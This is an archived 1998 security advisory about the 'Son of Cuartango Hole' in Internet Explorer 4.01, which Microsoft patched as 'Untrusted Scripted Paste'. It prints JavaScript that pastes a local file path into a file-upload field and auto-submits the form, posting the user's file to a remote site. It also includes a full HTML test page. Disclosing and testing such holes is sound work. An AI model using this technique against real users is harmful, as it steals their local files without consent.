TUCoPS :: Browsers :: cuarta~1.txt

Son of Cuartango Hole in MSIE 4.01
 

The Son of Cuartango Hole 

http://pages.whowhere.com/computers/cuartangojc/son1.html

Affected software
Microsoft Internet Explorer 4.01

Fixes
Microsoft has released a fix  :  Microsoft Security Site 
http://www.microsoft.com/security/bulletins/ms98-015.asp
Microsoft names the vulnerability as "Untrusted Scripted Paste". 
They have created a new USP patch.

Technical description

                          There is an  input form field used to tranfer files from the browsing computer to a WEB site this
                          input field is HTML coded as :

                          <input type="file" name="filename" size="30">

                          Theoretically this input field can be filled only by the user by clicking a "Browse" button or
                          typing the file name.
                          In order to avoid a security hole, script files are not allowed to modify the value of this
                          input   field, the sentence bellow will not work   :

                          document.forms[0].filename = "C:\config.sys";

                          The Cuartango Hole revealed that a single scripted "copy and paste" operation could write a file
                          name on the input field,   Microsoft's old  USP patch fixed this single  "copy and  paste"
                          vulnerability.
                          There is a workaround making the "paste" operation work again. The idea is : create a "textrange"
                          object with the selection of the file input and then paste over this "textrange" object. 

                          The code below is a bit more sophisticated than the "Cuartango Hole" code :

                          T1 is a hidden input field defined in a second  form containing  the file pathname to be copied to
                          the clipboard.


                          <body onload="getfile()">

                          function getfile()
                          {
                          document.forms[1].T1.select();
                          document.execCommand("copy");
                          document.forms[0].filename.select();
                          var rng = document.selection.createRange();
                          rng.execCommand("paste");
                          document.forms[0].submit();
                          }

                          The result is that the file  is POSTED  to the malicious WEB site defined in the form action
                          property.
                          A similar  code will also work inside an HTML formatted e-mail. 

                          The Cuartango Hole code was very similar :

                          function getfile()
                          {
                          document.forms[1].T1.select();
                          document.execCommand("copy");
                          document.forms[0].filename.select();
                          document.execCommand("paste");
                          document.forms[0].submit();
                          }



Example Exploit

<html>

<head>
<meta name="keywords"
content="son of cuartango hole,cuartango hole,cuartango hack,cuartango,security,security site,USP,USP patch,security web,hack,security,risk,hole,security hole,explorer">
<title>Son of Cuartango Hole Test</title>
<bgsound src="images/gallarda.mid" loop="-1">
</head>

<body onload="getfile()">
<script language="JavaScript">

function getfile()
{
document.forms[0].filename.select(); // onload="getfile()"
var rng = document.selection.createRange();
document.forms[1].T1.select();
document.execCommand("copy");
rng.execCommand("paste");
if(document.forms[0].filename.value == "")
        alert("Your browser does not have the security hole");
else
        alert("Security hole in browser -- " + navigator.userAgent );
}

</script>


<p align="center"><big><font color="#FF0000"><big><big>The Son of Cuartango Hole Test</big></big></font></big><small></p>
</small>

<p align="center">&nbsp;</p>
<small>

<form enctype="multipart/form-data" method="post"
action="http://www.angelfire.com/cgi-bin/bedit">
  <div align="center"><center><p><strong>This is a test to verify if you are affected by the
  Son of Cuartango Hole</strong>.<br>
  <strong>If file name (/test.txt) is made visible in the box below then you are effected.</strong></p>
  </center></div><div align="center"><center><p>&nbsp;<input type="file" name="filename"
  size="15"></p>
  </center></div>
</form>

<form method="POST">
  <input type="hidden" name="T1" value="/test.txt"><p>&nbsp;</p>
</form>
</small>

<p align="center"><font size="3" color="#0000FF"><a

href="http://pages.whowhere.com/computers/cuartangojc/son1.html"><strong>Back to Son Of
Cuartango Hole page</strong></a></font></p>

<p align="center">&nbsp;&nbsp;&nbsp; <a href="mailto:cuartangojc@mx3.redestb.es">Juan
Carlos García Cuartango</a></p>

<p align="center"><font face="Arial"><img src="/cgi-bin/Count.cgi" width="97" height="24"><small><br>
</small></font></p>

<p><font size="2" face="Garamond">Last update&nbsp;1998&nbsp; Nov 15 Año del Señor de
1998 </font></p>
</body>
</html>

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH